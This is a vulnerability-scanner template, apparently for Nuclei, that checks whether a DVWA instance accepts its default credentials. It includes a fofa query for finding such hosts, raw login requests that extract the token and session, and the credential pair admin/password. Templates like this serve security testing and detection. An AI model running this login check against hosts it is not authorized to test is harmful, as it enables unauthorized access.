Vulnerability Description
Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
fofa: app="Damn-Vulnerable-Web-App-(DVWA)-Login"
id: dvwa-default-login

info:
  name: DVWA Default Login
  author: pdteam
  severity: critical
  description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
  reference:
    - https://opensourcelibs.com/lib/dvwa
  classification:
    cwe-id: CWE-798
  metadata:
    max-request: 2
  tags: dvwa,default-login,vuln

http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
        Connection: close

      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: PHPSESSID={{session}}; security=low
        Connection: close

        username={{username}}&password={{password}}&Login=Login&user_token={{token}}

    payloads:
      username:
        - admin
      password:
        - password
    attack: pitchfork

    extractors:
      - type: regex
        name: token
        group: 1
        internal: true
        part: body
        regex:
          - "hidden' name='user_token' value='([0-9a-z]+)'"

      - type: kval
        name: session
        internal: true
        part: body
        kval:
          - PHPSESSID

    host-redirects: true
    matchers:
      - type: word
        words:
          - "You have logged in as 'admin'"
# digest: 490a004630440220201404365eba7e7c66a3871324f4c85765baa33dc5f62c39b438d8a8cc488a0d02200db97a8412317790ab5a3b918351a34709d536ace525794b06570ccccf9ccf9e:922c64590222798bb761d5b6d8e72950